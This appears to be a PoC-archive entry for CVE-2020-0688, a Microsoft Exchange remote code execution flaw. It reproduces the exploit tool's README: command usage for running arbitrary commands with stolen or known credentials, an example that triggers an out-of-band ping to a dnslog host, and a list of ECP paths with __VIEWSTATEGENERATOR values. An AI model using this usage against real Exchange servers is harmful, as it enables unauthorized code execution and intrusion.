CVE-2020-0688 PoC — Microsoft Exchange Server 授权问题漏洞

Source

https://github.com/Ridter/cve-2020-0688

Associated Vulnerability

Title:Microsoft Exchange Server 授权问题漏洞 (CVE-2020-0688)
Description:Microsoft Exchange Server是美国微软（Microsoft）公司的一套电子邮件服务程序。它提供邮件存取、储存、转发，语音邮件，邮件过滤筛选等功能。 Microsoft Exchange Server 中存在授权问题漏洞，该漏洞源于程序无法正确处理内存中的对象。攻击者可借助特制的电子邮件利用该漏洞在系统用户的上下文中运行任意代码。以下产品及版本受到影响：Microsoft Exchange Server 2010，Microsoft Exchange Server 2013，Micro

Description

cve-2020-0688

Readme

# cve-2020-0688
Usage:
```
usage: cve-2020-0688.py [-h] -s SERVER -u USER -p PASSWORD -c CMD

optional arguments:
  -h, --help            show this help message and exit
  -s SERVER, --server SERVER
                        ECP Server URL Example: http://ip/owa
  -u USER, --user USER  login account Example: domain\user
  -p PASSWORD, --password PASSWORD
                        Password
  -c CMD, --cmd CMD     Command u want to execute
```

example:
```
python cve-2020-0688.py -s https://ip/owa/ -u user -p pass -c "ping test.ph4nxq.dnslog.cn"
```

![](https://blogpics-1251691280.file.myqcloud.com/imgs/20200227105319.png)


Other available paths:
```
/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27
/ecp/PersonalSettings/HomePage.aspx?showhelp=false&__VIEWSTATEGENERATOR=1D01FD4E
/ecp/PersonalSettings/HomePage.aspx?showhelp=false&__VIEWSTATEGENERATOR=1D01FD4E
/ecp/Organize/AutomaticReplies.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/RulesEditor/InboxRules.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Organize/DeliveryReports.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/MyGroups/PersonalGroups.aspx?showhelp=false&__VIEWSTATEGENERATOR=A767F62B
/ecp/MyGroups/ViewDistributionGroup.aspx?pwmcid=1&id=38f4bec5-704f-4272-a654-95d53150e2ae&ReturnObjectType=1&__VIEWSTATEGENERATOR=321473B8
/ecp/Customize/Messaging.aspx?showhelp=false&__VIEWSTATEGENERATOR=9C5731F0
/ecp/Customize/General.aspx?showhelp=false&__VIEWSTATEGENERATOR=72B13321
/ecp/Customize/Calendar.aspx?showhelp=false&__VIEWSTATEGENERATOR=4AD51055
/ecp/Customize/SentItems.aspx?showhelp=false& __VIEWSTATEGENERATOR=4466B13F
/ecp/PersonalSettings/Password.aspx?showhelp=false&__VIEWSTATEGENERATOR=59543DCA
/ecp/SMS/TextMessaging.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/TroubleShooting/MobileDevices.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Customize/Regional.aspx?showhelp=false&__VIEWSTATEGENERATOR=9097CD08
/ecp/MyGroups/SearchAllGroups.slab?pwmcid=3&ReturnObjectType=1__VIEWSTATEGENERATOR=FD338EE0
/ecp/Security/BlockOrAllow.aspx?showhelp=false&__VIEWSTATEGENERATOR=362253EF
```

File Snapshot


 [4.0K]  /data/pocs/8be447a27bd7438aad817a284bc4c2a1d0141d35
├── [5.0K]  0688-detect.py
├── [3.9K]  cve-2020-0688.py
├── [ 38K]  ExchangeCmdPy.py
├── [2.1K]  README.md
└── [  55]  requirements.txt

0 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!